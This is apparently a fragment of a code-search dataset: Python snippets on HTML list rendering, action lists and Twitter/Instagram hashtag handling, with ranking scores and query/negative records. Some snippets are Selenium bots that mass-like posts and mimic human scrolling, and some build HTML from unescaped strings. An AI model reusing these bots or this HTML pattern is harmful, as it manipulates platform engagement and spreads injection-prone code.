"def grants_to_asciidoc(obj):\r\n\r\n if not obj.permits:\r\n return u''\r\n\r\n coldesctbl_attributes = '[cols=\"8m,%d*^3m\",options=\"header\",width=\"70%%\"]' % len(PERMITS_LIST)\r\n coldesctbl_header = \"|User or Role \" + ' '.join(['|%s' % k for k in PERMITS_LIST])\r\n \r\n # Some globals to locals\r\n table_sep = TABLE_SEP\r\n\r\n grt_rows = []\r\n for k,v in obj.permits.iteritems():\r\n s = '|**%s**' % k\r\n for p in PERMITS_LIST:\r\n s += '|%s' % {True:'GRANT',False:'REVOKE',None:''}[v[p]]\r\n grt_rows.append(s)\r\n grt_rows = '\\n'.join(grt_rows)\r\n\r\n return \"\"\"\r\n.Privileges\r\n%(coldesctbl_attributes)s\r\n%(table_sep)s\r\n%(coldesctbl_header)s\r\n%(grt_rows)s\r\n%(table_sep)s\r\n\"\"\" % locals()",
"def __convertToHtmlListElement(self, listOfStringValues: List[str]) -> str:\n return ''.join(f\"<li>{element}</li>\" for element in listOfStringValues)",
"def to_md(self):\n soup = BeautifulSoup(f\"<div id={self.action_id}></div>\", \"html.parser\")\n for action in self.actions:\n table = soup.new_tag(\"table\")\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag(\"tr\")\n td_key = soup.new_tag(\"td\", attrs={\"class\": \"field-key\"})\n td_val = soup.new_tag(\"td\", attrs={\"class\": \"field-value\"})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()",
"def action_list(self):\n already_visited, can_visit_list = self.check_hand()\n\n message = []\n\n for msg, hand in [('Visited', already_visited), ('Available', can_visit_list)]:\n bits = []\n\n for card in hand:\n h = Hero(card)\n rank = Hero.RANKS[h.client['rank']]\n\n # 10/J/Q/K/A\n bits.append(u'{0}{1}'.format(\n rank if h.client['rank'] == Hero.TEN else rank[0],\n Hero.FACE_SYMBOLS[h.client['race']]\n ))\n\n message.append(u'{0}={1}'.format(msg, ','.join(bits)))\n\n self.chat.send_message(EmrossWar.safe_text(', '.join(message)))",
"def actions(self, request, action_list, group):\n return action_list",
"def get_actions(self):\n return []",
"def actions(self):\n return self._action_list",
"def get_actions(self):\n\n if self.description == exceptions.NotAvailableError:\n raise exceptions.NotAvailableError('Can\\'t get actions because a description for this service is'\n ' not available.')\n return list(self.actions.values())",
"def whitelist_json_to_txt(whitelist_json):\n\n ret = []\n if whitelist_json.get('version',None) == '1_0':\n for item in whitelist_json['items']:\n ret.append(whitelist_format.format(gate=item['gate'], trigger=item['trigger_id']))\n\n return ret",
"def parse_menu_items(menu_items: List[dict]) -> List[str]:\n\n def parse_menu_item(menu_item: dict) -> str:\n text = menu_item.get(\"text\").strip()\n\n allergens = menu_item.get(\"allergens\")\n allergen_emojis = []\n if allergens:\n for allergen in allergens:\n allergen_key = allergen.get(\"slug\")\n emoji = ALLERGEN_MAP.get(allergen_key)\n if emoji:\n allergen_emojis.append(emoji)\n\n return f'{text} {\" \".join(allergen_emojis)}'.strip()\n\n handlers = {\n \"menu_title\": lambda text: f\"\\n*{text}*\",\n \"menu_description\": lambda text: f\"*{text}*\",\n \"menu_item\": parse_menu_item,\n }\n\n parsed_items = []\n\n for item in menu_items:\n # acf_fc_layout conveniently tells us how to format each row\n item_type = item.get(\"acf_fc_layout\")\n item_text = item.get(item_type)\n parsed_item = prettify(handlers[item_type](item_text))\n parsed_items.append(parsed_item)\n\n return parsed_items",
"def render(self):\n if self.can_render():\n output = '<ul>'\n for item in self.items:\n output += \"<li>{0}</li>\".format(item)\n return output + '</ul>'\n return ''",
"def getAllHumanActions(self):\n return self.human_policy.actions",
"def get_actions(self):\n actions = []\n for section in self._sections:\n for (sec, action) in self._actions:\n if sec == section:\n actions.append(action)\n\n actions.append(MENU_SEPARATOR)\n return actions",
"def _serialize_submitted_documents(self, item):\n if not item.has_proposal:\n return []\n\n docs = IContentListing(item.proposal.resolve_submitted_documents())\n return [doc.render_link() for doc in docs]",
"def list(self):\n return list(\n filter(\n lambda x: x.get('type') == 'tagit', # pragma: no cover\n self._post(\n request=ApiActions.LIST.value,\n uri=ApiUri.ACTIONS.value,\n ).get('actions')\n )\n )",
"def get_list_html(self, items):\n html = \"\"\"\n <html>\n\t\t\t<head>\n\t\t\t\t<title>OpenFDA Cool App</title>\n\t\t\t</head>\n\t\t\t<body>\n <ol>\n \"\"\"\n\n for item in items:\n html += \"<li>\" + item + \"</li>\\n\"\n\n html += \"\"\"\n </ol>\n\t\t\t</body>\n </html>\n \"\"\"\n\n return html"
] |
[
"0.523548",
"0.5062648",
"0.5057534",
"0.50366926",
"0.48965392",
"0.48873514",
"0.48711312",
"0.48421466",
"0.4839564",
"0.48027083",
"0.47810283",
"0.47803128",
"0.47630978",
"0.4751867",
"0.47392517",
"0.47254217",
"0.46918416",
"0.46840894",
"0.46765396",
"0.4671996",
"0.46668178",
"0.46648702",
"0.46634835",
"0.466275",
"0.46562013",
"0.46468568",
"0.4646797",
"0.46286553",
"0.46201783",
"0.46065512"
] |
0.7828043
|
0
|
Wrap each string element in an <li> tag and join the elements.
|
def __convertToHtmlListElement(self, listOfStringValues: List[str]) -> str:
return ''.join(f"<li>{element}</li>" for element in listOfStringValues)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def make_tags(tag, word):\n tag1 = \"<{}>\".format(tag)\n tag2 = \"</{}>\".format(tag)\n final = tag1 + word + tag2\n return final",
"def create_string(element_list):\n \n outstring = '<html><body>'\n \n for element in element_list:\n outstring += html.tostring(element)\n outstring+='</body></html>'\n return outstring",
"def retag_string(self, string, tags):\r\n for (i, tag) in enumerate(tags):\r\n p = '<%s>' % i\r\n string = re.sub(p, tag, string, 1)\r\n return string",
"def join(self, iterable) -> String:\n pass",
"def xmlwrap(cls, message, width):\n parts = []\n tag = None\n for part in cls.tag_re.split(message):\n if not part or part == tag:\n continue\n try:\n tag = cls.tag_re.search(part).group(2)\n parts.append(part)\n except AttributeError:\n tag = None\n parts += cls.whitespace_re.split(part)\n\n lines = [[]]\n size = 0\n for part in parts:\n if part:\n part_len = len(part)\n if size and size + part_len > width:\n lines.append([])\n size = 0\n lines[-1].append(part)\n size += part_len\n return [''.join(parts) for parts in lines]",
"def edit_string_for_tags(tags):\r\n names = []\r\n use_commas = False\r\n for tag in tags:\r\n name = tag.name\r\n if u',' in name:\r\n names.append('\"%s\"' % name)\r\n continue\r\n elif u' ' in name:\r\n if not use_commas:\r\n use_commas = True\r\n names.append(name)\r\n if use_commas:\r\n glue = u', '\r\n else:\r\n glue = u' '\r\n return glue.join(names)",
"def join(self, iterable):\n result = ANSIString(\"\")\n last_item = None\n for item in iterable:\n if last_item is not None:\n result += self._raw_string\n if not isinstance(item, ANSIString):\n item = ANSIString(item)\n result += item\n last_item = item\n return result",
"def _html_tagger(tag: str, attr_pair: tuple = None,\n indentation: str ='', long: bool = False):\n if attr_pair:\n beg = tag + ' {0}={1!r}'.format(*attr_pair)\n else:\n beg = tag\n end = tag\n\n if long:\n def wrap(string):\n return indentation + f'<{beg}>\\n' \\\n + string + '\\n' \\\n + indentation + f'</{end}>'\n else:\n def wrap(string):\n return indentation + f'<{beg}>{string}</{end}>'\n return wrap",
"def join_tags(tags):\n names = []\n delimiter = settings.TAGGIT_SELECTIZE['DELIMITER']\n for tag in tags:\n name = tag.name\n if delimiter in name or ' ' in name:\n names.append('\"%s\"' % name)\n else:\n names.append(name)\n return delimiter.join(sorted(names))",
"def tag(word: str, tags: list):\n open_tags = ['<' + tag + '>' for tag in tags]\n close_tags = ['</' + tag + '>' for tag in reversed(tags)]\n logger.debug('*************** %s ' %\n\n word)\n return ''.join(open_tags) + word + ''.join(close_tags)",
"def wrap(string, left=\"[\", right=\"]\"):\n if string:\n return left+string+right\n return \"\"",
"def _text_of(self, elem):\n if isinstance(elem, Tag):\n text = [ ]\n for sub_elem in elem:\n text.append(self._text_of(sub_elem))\n\n return \" \".join(text)\n else:\n return elem.string",
"def _postprocess(\n self,\n tags: List[str],\n words: List[str],\n pos: bool = False,\n ):\n result = list()\n\n i = 0\n for tag in tags:\n if (\"<\" not in tag) and (\">\" not in tag):\n if pos:\n result.append(f\"{words[i]}/{pos[i]}\")\n else:\n result.append(words[i])\n i += 1\n else:\n result.append(tag)\n\n return \" \".join(result)",
"def join_list(items: Iterable[str]) -> str:\n\n return ITEM_SEPARATOR.join(items)",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += \", \" + string\n return out",
"def openCloseTag ( x, text ):\n assert str(type(x)) == \"<type 'str'>\"\n assert str(type(text)) == \"<type 'str'>\"\n tag = \"<\" + str ( x ) + \">\" + text + \"</\" + str ( x ) + \">\"\n assert str ( type ( tag ) ) == \"<type 'str'>\"\n return tag",
"def _postprocess(self, tags: List[str], words: List[str], pos: List[str]):\n result = list()\n\n i = 0\n for tag in tags:\n if (\"<\" not in tag) and (\">\" not in tag):\n if pos:\n result.append(f\"{words[i]}/{pos[i]}\")\n else:\n result.append(words[i])\n i += 1\n else:\n result.append(tag)\n\n return \" \".join(result)",
"def concat_text(self, elem):\n\n s = u\" \".join([ frag.strip() for frag in elem.itertext() if re.search(\"\\S\", frag) ]) \n return re.sub(\" (\\W )\", \"\\\\1\", s)",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += string.join(\", \")\n return out",
"def surround(inp):\r\n if inp is list:\r\n for i in range(len(inp)):\r\n inp[i] = \"'\"+str(inp[i])+\"'\"\r\n return inp\r\n return \"'\"+str(inp)+\"'\"",
"def my_join(iters, string):\n out = \"\"\n for i in range(iters):\n out += \",\" + string \n return out",
"def stringiter_combine(flt_ctxt, in_objs):\n return ('stringiter',\n chain(*tuple(o('stringiter', protect_safe=True) for o in in_objs)))",
"def _result(self, depth, elements, wrapped, left='[', right=']'):\n if not wrapped:\n return left + ', '.join(elements) + right\n else:\n spaces = (depth * self.indent) * ' '\n first = left + '\\n' + spaces\n sep = ',\\n' + spaces\n #last = '\\n' + spaces[:-indent] + right # K&R\n last = right # Lisp\n return first + sep.join(elements) + last",
"def wrap_always(text, width):\n\n if type(text) is str:\n return '\\n'.join([ text[width*i:width*(i+1)] for i in xrange(int(math.ceil(1.*len(text)/width))) ])\n elif type(text) is list:\n\n new_text = ''\n counter = 0\n for e in text:\n counter += 1\n new_text += '('+str(counter)+') '+str(e)+\"\\n\"\n #new_text = ''.join(str(e) for e in text)\n return '\\n'.join([ new_text[width*i:width*(i+1)] for i in xrange(int(math.ceil(1.*len(new_text)/width))) ])",
"def wrap_tagged_text(text, count=0):\n # break only on white space, ignoring label breaks\n wrapped_text = text\n if count <= 0:\n return text\n divs = [\n split_chunk(chunk) for chunk in split_tagged_text_into_chunks(text)\n ]\n # total_length = sum([len(div.text) for div in divs]) # UNUSED\n total_string = \"\".join([div.text for div in divs])\n final_nl_b = total_string.endswith(\"\\n\")\n total_lines = total_string.splitlines()\n wrapped_s = \"\\n\".join(\n [textwrap.fill(s, count) for s in total_lines]\n ) + (\"\\n\" if final_nl_b else \"\")\n # now have to map the wrapped_string to the divs!\n insert_pts = []\n divx = x = tl = wi = 0\n div = divs[divx]\n dl = len(div.text)\n for tsc in total_string:\n if wrapped_s[wi] != tsc:\n insert_pts.append([wi, divx, x, tl + x, tsc.isspace()])\n if not tsc.isspace():\n wi += 1\n wi += 1\n x += 1\n if x >= dl:\n tl += dl\n x = 0\n divx += 1\n try:\n div = divs[divx]\n if div:\n try:\n dl = len(div.text)\n except AttributeError:\n pass\n except IndexError:\n pass\n if insert_pts:\n divs_l = [list(div) for div in divs]\n for ipt in insert_pts[::-1]:\n _, divx, x, _, sp = ipt\n divs_l[divx][TEXT] = \"{0}\\n{1}\".format(\n divs[divx][TEXT][:x],\n divs[divx][TEXT][x + 1 if sp else x:],\n )\n divs_t = [Chunk(*div) for div in divs_l]\n chunks = [\n (\n \"<t {0}>{1}</t>\".format(div.attrs, div.text)\n if div.attrs\n else div.text\n )\n for div in divs_t\n if div and div.text\n ]\n wrapped_text = \"\".join(chunks)\n return wrapped_text",
"def stringify(element, newlines=True):\n\n def stop_if(e):\n return isinstance(e, (DefinitionList, Cite))\n\n def attach_str(e, doc, answer):\n if hasattr(e, 'text'):\n ans = e.text\n elif isinstance(e, HorizontalSpaces):\n ans = ' '\n elif isinstance(e, VerticalSpaces) and newlines:\n ans = '\\n\\n'\n elif type(e) == DefinitionList:\n ans = []\n for item in e.content:\n term = ''.join(stringify(part) for part in item.term)\n definitions = '; '.join(stringify(defn) for defn in item.definitions)\n ans.append(f'- {term}: {definitions}')\n ans = '\\n'.join(ans)\n elif type(e) == Cite:\n ans = stringify(e.content)\n else:\n ans = ''\n\n # Add quotes around the contents of Quoted()\n if type(e.parent) == Quoted:\n if e.index == 0:\n ans = '\"' + ans\n if e.index == len(e.container) - 1:\n ans += '\"'\n\n answer.append(ans)\n\n answer = []\n f = partial(attach_str, answer=answer)\n element.walk(f, stop_if=stop_if)\n return ''.join(answer)",
"def itag_of_soup(soup):\n if isinstance(soup, bs4.element.NavigableString):\n return str(soup)\n to_return = Tag([itag_of_soup(content) for content in soup.contents])\n to_return.soup = soup\n return to_return",
"def flatten(*args: Strings) -> List[str]:\n return list(each_string(*args))",
"def escape_list(l):\n return [_escape_harlowe_html(item) if isinstance(item, text_type) else str(item) for item in l]",
"def add_smart_quotes(article: Article) -> Article:\n text_tag: bs4.NavigableString\n for text_tag in article.content.find_all(text=True):\n #\\1 will sub in the first matched group\n new_tag = re.sub(r'\"([^\"]*)\"', r'“\\1”', text_tag)\n text_tag.replace_with(new_tag)\n return article"
] |
[
"0.5969318",
"0.5911578",
"0.58806515",
"0.5838043",
"0.5793163",
"0.5753264",
"0.5704033",
"0.5701071",
"0.56826556",
"0.55926114",
"0.5556637",
"0.55514723",
"0.5513206",
"0.5507362",
"0.54939824",
"0.5471039",
"0.54170644",
"0.5402638",
"0.5396076",
"0.53810865",
"0.5355535",
"0.53028667",
"0.52947277",
"0.5292037",
"0.5278109",
"0.52493083",
"0.52466464",
"0.52417725",
"0.523058",
"0.5229855"
] |
0.6051207
|
0
|
Check if the health event contains RCA or not.
|
def __isNotRcaEvent(self, event: Dict) -> bool:
if HEALTH_EVENT_TYPE in event[PROPERTIES] and event[PROPERTIES][HEALTH_EVENT_TYPE].upper() == RCA:
return False
if RECOMMENDED_ACTIONS_CONTENT in event[PROPERTIES]:
return False
return True
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def check_rpt_status(self) -> bool:\n return self.allele == self.fasta_alt",
"def cca(self):\n return self._current_rx_count == 0",
"def verifyActionCenterRts():\n pass",
"def is_rova_area(self):\n url = 'https://www.rova.nl/api/waste-calendar/upcoming'\n\n # request data from rova API and check if garbage is collected at this address\n # requesting with a non-existing postalcode will result in a error message\n\n response = requests.get(url, params={\n 'postalcode': self.zip_code,\n 'houseNumber': self.house_number,\n 'addition': self.house_addition,\n 'take': '1',\n })\n\n response.raise_for_status()\n\n rova_response = response.text.strip()\n if rova_response != '[]':\n rova_response = \"OK\"\n return rova_response == \"OK\"",
"def check_event_status(self):\n pass",
"def check_ca(self):\n return m2.x509_check_ca(self.x509)",
"def testHealthAssessRash(self):\n attr = self.session.create_visit_attr()\n\n self.util.boolTypeTest(self, attr, \"rash\")\n\n self.util.boolPropertyTest(self, attr, \"rash\")",
"def verify_aggC1(self):\n self.c.execute('''SELECT aggCode, aggC1\n FROM Agglomerations\n WHERE aggState = 1 AND ((aggC1) IS NULL OR (aggC1)>100 OR (aggC1)<0)\n ''')\n res = self.c.fetchall()\n if (len(res) > 0):\n return [False,\n \"In the agglomeration '%s' that has the aggState equal to 1 the reported aggC1 '%s' is incorrect\",\n res]\n else:\n return [True]",
"def report_health(self):\n return True",
"def validate(self) -> bool:\n # Call RH for the collector VM. If the call is successful, the collector VM has been assigned the right roles.\n collectorVM = AzureInstanceMetadataService.getComputeInstance(\n self.tracer, self.name)\n collectorVMArmId = ARM_ID_TEMPLATE % (\n collectorVM[SUBSCRIPTION_ID], collectorVM[RESOURCE_GROUP_NAME], collectorVM[NAME])\n rhClient = ResourceHealth(self.tracer)\n try:\n rhEvents = rhClient.getHistoricalResourceAvailabilityEvents(\n self.ctx.authToken, collectorVMArmId)\n except Exception as e:\n self.tracer.error(\n \"[%s] RH call validation failed(%s).\", self.fullName, e, exc_info=True)\n return False\n\n return True",
"def is_red_car(self):\n return self.identifier == 18",
"def sanity_check(self):\n res = True\n res = res and self.detected\n res = res and np.sum(self.diffs) < 30000 # experimental value\n return res",
"def _is_this_healthy_rDNA(self):\n if self.length < 3000:\n return 0\n mapping_state = []\n for item in self.sam_summary:\n if item[1] != '0':\n mapping_state.append(1)\n else:\n mapping_state.append(0)\n threshold = 0.8\n if sum(mapping_state)/len(mapping_state) > threshold:\n return 1\n else:\n for i in range(1, len(mapping_state) - 50):\n if sum(mapping_state[i:])/len(mapping_state[i:]) > threshold or \\\n sum(mapping_state[:-i])/len(mapping_state[:-i]) > threshold:\n healthy = 2\n return 0",
"def testHealthAssessArthralgia(self):\n attr = self.session.create_visit_attr()\n\n self.util.boolTypeTest(self, attr, \"arthralgia\")\n\n self.util.boolPropertyTest(self, attr, \"arthralgia\")",
"def is_contagious(self):\n if self.health >= 0 and self.health <= 49:\n return True\n elif self.health >= 50 and self.health <= 100:\n return False",
"def check(self, image):\n return get_hist_corr(self.image, image) >= self.THRESHOLD",
"def wantsReadEvent(self):\r\n if self.result != None:\r\n return self.result == 0\r\n return None",
"def stat_cartridge_health(self):\n raise NotImplementedError",
"def is_CA(self):\n\n basicConstraints = self.get_basicConstraints()\n return basicConstraints is not None and basicConstraints[0]",
"def _check_rac_crs(cfg, warning=None, critical=None):\n bin_name = \"crsctl\"\n _check_attrs(cfg, [\"oh\", ])\n\n bin_name = os.path.join(cfg.oh, \"bin\", bin_name)\n try:\n args = bin_name + \" check crs\"\n cp = subprocess.run(args, shell=True, check=True, stdout=subprocess.PIPE)\n if cp.stdout is None:\n print(\"None result from crsctl\")\n return UNKNOWN\n out = str(cp.stdout, \"utf-8\")\n for l in out.split(os.linesep):\n if l.lstrip().rstrip() == \"\":\n continue\n if not l.lstrip().rstrip().endswith(\"is online\"):\n print(l)\n return CRITICAL\n print(out)\n return OK\n except subprocess.CalledProcessError as err:\n print(err.output)\n return UNKNOWN",
"def check_health(self):\n return defer.succeed(True)",
"def data_checker(xml):\n if not xml or 'response code=\"102\"' in xml:\n LOGGER.debug(\"The service 'oclc' is temporarily down!\")\n return False\n return True",
"def check_needs_escalation(self, escalation_time: timedelta, event: EventRecord) -> bool:\n oldest_event = self.get_oldest_event_with_fingerprint(event.fingerprint)\n\n if not oldest_event:\n return False\n\n return oldest_event.received_at <= datetime.utcnow() - escalation_time",
"def isProteic(self):\n from MolKit.PDBresidueNames import AAnames\n\n self.AARes = [x for x in self.residues if x.type in AAnames]\n\n water = [x for x in self.residues if x.type in ['HOH', 'WAT']]\n\n if len(self.AARes) and len(self.AARes)+len(water) == len(self.residues):\n return True\n else:\n return False",
"def is_covered(self):\n return self.has_cover",
"def test_check_cds_18(self):\n self.cds1.gene = \"A\"\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\", \"warning\")\n self.assertEqual(count, 2)",
"def have_cdc() -> bool:",
"def consensus_reached(self):\n pos, com, success = self.perception\n if len(com) > 0 and self.time > 1:\n return all(map(lambda x: x[1][\"consensus\"], com)) and self.consensus\n else:\n return True",
"def needs_run(self, cscan, xnat):\n _info = cscan.info()\n if _info['type'] not in self.scan_types:\n return False\n\n # Check for existing EDAT resource\n if XnatUtils.has_resource(cscan, 'EDAT'):\n LOGGER.debug('Has EDAT')\n return False\n\n return True",
"def check_valid_request_ca(self):\n\n self.check_valid_request_common()\n\n alg = self.get_POW().getSignatureAlgorithm()\n bc = self.get_POW().getBasicConstraints()\n eku = self.get_POW().getEKU()\n sia = self.get_POW().getSIA()\n\n if alg != rpki.oids.sha256WithRSAEncryption:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 has bad signature algorithm for CA: %s\" % alg)\n\n if bc is None or not bc[0] or bc[1] is not None:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA bad basicConstraints\")\n\n if eku is not None:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA EKU not allowed\")\n\n if sia is None:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA missing\")\n\n caRepository, rpkiManifest, signedObject, rpkiNotify = sia\n\n logger.debug(\"check_valid_request_ca(): sia: %r\", sia)\n\n if signedObject:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA must not have id-ad-signedObject\")\n\n if not caRepository:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA must have id-ad-caRepository\")\n\n if not any(uri.startswith(\"rsync://\") for uri in caRepository):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-caRepository contains no rsync URIs\")\n\n if any(uri.startswith(\"rsync://\") and not uri.endswith(\"/\") for uri in caRepository):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-caRepository does not end with slash\")\n\n if not rpkiManifest:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA must have id-ad-rpkiManifest\")\n\n if not any(uri.startswith(\"rsync://\") for uri in rpkiManifest):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-rpkiManifest contains no rsync URIs\")\n\n if any(uri.startswith(\"rsync://\") and uri.endswith(\"/\") for uri in rpkiManifest):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-rpkiManifest ends with slash\")\n\n if any(not uri.startswith(\"http://\") and not uri.startswith(\"https://\") for uri in rpkiNotify):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-rpkiNotify neither HTTP nor HTTPS\")"
] |
[
"0.5812587",
"0.5784343",
"0.56178385",
"0.5605711",
"0.5595467",
"0.5586229",
"0.5520362",
"0.5406098",
"0.5375033",
"0.5367486",
"0.5329484",
"0.5310734",
"0.53074825",
"0.53060085",
"0.5291778",
"0.52247566",
"0.5207978",
"0.5182046",
"0.5182002",
"0.5172207",
"0.5151738",
"0.51460433",
"0.51059294",
"0.5097097",
"0.5094065",
"0.5087749",
"0.5070114",
"0.50647765",
"0.5053695",
"0.5052985"
] |
0.73898304
|
0
|
Like the latest tweets for a given hashtag.
|
def like_tweet(self, tag):
self.bot.get('https://twitter.com/search?q=' + tag + '&src=typed')
self.__wait(3, 3)
for i in range(1, 3):
self.bot.execute_script('window.scrollTo(0,document.body.scrollHeight)')
self.__wait(2, 3)
tweets = self.bot.find_elements_by_tag_name('article')
links = []
for tweet in tweets:
sub_links = tweet.find_elements_by_tag_name('a')
links += [sub_link.get_attribute('href')
for sub_link in sub_links if 'status' in sub_link.get_attribute('href')]
print('Started to like {} tweets'.format(len(links)))
for link in links:
self.bot.get(link)
self.__wait(3, 5)
likes = self.bot.find_elements_by_css_selector('div[data-testid="like"]')
for like in likes:
like.click()
self.__wait(3, 5)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def analyze_hashtag(self, hashtag, count=200):\n tweets = []\n\n for x in xrange(0, int(count / 100)):\n tweets.extend(self.tweet_fetcher.get_tweets(hashtag))\n\n analyzed_tweets = sort_tweets(self.sa.classify(tweets))\n\n self.analyzed_tweets = analyzed_tweets\n\n return analyzed_tweets",
"def filter_by_hashtag(tweets: list, hashtag: str) -> list:\n tweets_with_hashtag = {} # findall(): Kui tekstis on rohkem kui üks regulaaravaldisele vastav alamsõne saab kõikide vastete järjendi moodustada funktsiooniga findall()\n pattern = r\"#\\w+\" # \\w : tähed, numbrid, alakriips, + : 1 või rohkem\n for tweet in tweets: # r\"string\" on \"raw\" tüüpi string, mis tähendab, et kurakaldkriipsud(\"\\\") jäetakse teksti alles.\n find_hashtag = re.findall(pattern, tweet.content) # word:\\w\\w\\w. Regulaaravaldisele vastab täpne sõne \"word:\" ning sellele järgnevad 3 suvalist tähte.\n if find_hashtag:\n tweets_with_hashtag.setdefault(ht, []).append(tweet)\n return tweets_with_hashtag[hashtag]",
"def search_hashtag(self):\n hashtag = get_random_hashtag()\n self.driver.get(\n '{}/explore/tags/{}'.format(self.base_url, hashtag))\n time.sleep(2)\n\n # mimic a scroll\n scroll_helper(510, self.driver)\n time.sleep(1)\n scroll_helper(600, self.driver)\n time.sleep(1)\n\n # Get a random pic to like\n random_pic = self.driver.find_elements_by_xpath(\n \"//a[contains(@href, '/p/')]\")[randint(5, 40)]\n self.driver.get(random_pic.get_attribute(\"href\"))\n\n # Scroll like button into view and click it\n time.sleep(3)\n scroll_helper(500, self.driver)\n self.like_photo()\n\n # Retrun bot to homepage after clicking like\n time.sleep(0.5)\n self.driver.get(self.base_url)",
"def get_tweets(hashtag):\n api = twitter.Api(consumer_key=TWITTER_API_CONSUMER_KEY,\n consumer_secret=TWITTER_API_CONSUMER_SECRET,\n access_token_key=TWITTER_API_ACCESS_TOKEN_KEY,\n access_token_secret=TWITTER_API_ACCESS_TOKEN_SECRET)\n\n query = (f\"q=%23{HASHTAG}%20-RT\"\n f\"&result_type=recent&since=2019-01-01&count={NUM_TWEETS}\")\n results = api.GetSearch(raw_query=query)\n\n return [\n format_tweet(tweet.AsDict())\n for tweet in results\n ]",
"def handle_hashtags_tweets_for_date(current_date, current_hashtag):\n\n hashtags_tweets = current_hashtag.tweets.filter(save_date=current_date).distinct()\n hashtags_tweets_list = [hashtags_tweet for hashtags_tweet in hashtags_tweets]\n hashtags_tweets_list.sort(key=lambda tweet: (tweet.retweets, tweet.likes), reverse=True)\n hashtags_tweets_list = hashtags_tweets_list[:10]\n hashtags_tweets_chart = PlotPainter.plot_tweets(hashtags_tweets_list) if hashtags_tweets else None\n return hashtags_tweets_chart, hashtags_tweets_list",
"def handle_current_hashtag(api_pipeline, current_hashtag):\n\n current_hashtag_saved_tweets = current_hashtag.tweets.all()\n hashtags_tweets = api_pipeline.get_recent_tweets_for_hashtag(current_hashtag.text, how_many=5)\n for hashtags_tweet in hashtags_tweets:\n if hashtags_tweet not in current_hashtag_saved_tweets.filter(save_date=datetime.datetime.today().date()):\n hashtags_tweet.save()\n current_hashtag.tweets.add(hashtags_tweet)\n current_hashtag.save()\n hashtags_tweets.sort(key=lambda tweet: (tweet.retweets, tweet.likes), reverse=True)\n hashtags_tweets_chart = PlotPainter.plot_tweets(hashtags_tweets) if hashtags_tweets else None\n return hashtags_tweets, hashtags_tweets_chart",
"async def tags(self, ctx, tag=None):\r\n\t\tnum = 0\r\n\t\tTags = self.settings.ServerConfig(ctx.guild.id, 'Tags')\r\n\t\tfuz = self.bot.get_cog('FuzzySearch')\r\n\t\tif not fuz:\r\n\t\t\treturn await ctx.send('Can\\'t find FuzzySearch Cog')\r\n\r\n\t\tRes = fuz.fuzSearch(ctx, tag, Tags)\r\n\r\n\t\t\t\t\r\n\t\tif ctx.author.top_role.colour:\r\n\t\t\tcol = ctx.author.top_role.colour\r\n\t\telse:\r\n\t\t\tcol =self.settings.randomColor()\r\n\r\n\t\tembed = discord.Embed(\r\n\t\t\ttitle = Res[num],\r\n\t\t\tdescription = Tags[Res]['data'],\r\n\t\t\tcolour = col\r\n\t\t)\r\n\t\tembed.set_footer(text='Last Edited {}'.format(Tags[Res]['time']))\r\n\t\tawait ctx.send(embed=embed)",
"def get_hashtags(self):\n\t\t# Only first level comments should be checked for hashtag. Maybe.\n\t\tpassl",
"def filter_tweets(tweets):\n # We keep only tweets by chrisalbon with pictures\n search_tweets = [tw for tw in tweets if tw['username'] == '@chrisalbon' and len(tw['images']) > 0]\n # He made multiple tweets on the same topic, we keep only the most recent tweets\n # We use the indexes of the reversed tweet list and dictionnaries to keep only key \n unique_search_index = sorted(list({t['text'].lower():i for i,t in list(enumerate(search_tweets))[::-1]}.values()))\n unique_search_tweets = [search_tweets[i] for i in unique_search_index]\n\n # Keep non-downloaded tweets\n most_recent_file = sorted([datetime.datetime.fromtimestamp(os.path.getmtime(path)) \n for path in glob.glob(\"./downloaded_pics/*.jpg\")], reverse=True)[0]\n recent_seach_tweets = [tw for tw in unique_search_tweets if tw['date'] > most_recent_file]\n\n # Uncomment for testing new tweets\n # recent_seach_tweets = [tw for tw in unique_search_tweets if tw['date'] > datetime.datetime(2017, 7, 6, 13, 41, 48)]\n return recent_seach_tweets",
"def readHashtags():\n next_max_id = True\n reader = HashtagReader()\n while next_max_id:\n if next_max_id is True:\n next_max_id = ''\n _ = api.getUserFeed(usernameId=userId, maxid=next_max_id)\n reader.items.extend(api.LastJson.get('items', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n reader.checkBannedTags()\n reader.printHashtagsDict()",
"def get_hashtag_info(self, hashtag):\n uri = 'hashtags/' + hashtag\n return self.make_request(uri)",
"def hashtag(id):\n if (len(id) > 1):\n print \"El hashtag no pot tenir espais\"\n return\n\n id = id[0]\n if (id in i.getHashtags()):\n print \"Aquest hashtag ja existeix\"\n\n i.afegeixHashtag(id)",
"def buildHashtagsDict(tweets):\n hashtags = {}\n for tweet in tweets:\n if tweet['entities']['hashtags']:\n for hashtag in tweet['entities']['hashtags']:\n tag = hashtag['text'].lower().strip()\n if tag not in hashtags:\n hashtags[tag] = 1\n else:\n hashtags[tag] += 1\n return hashtags",
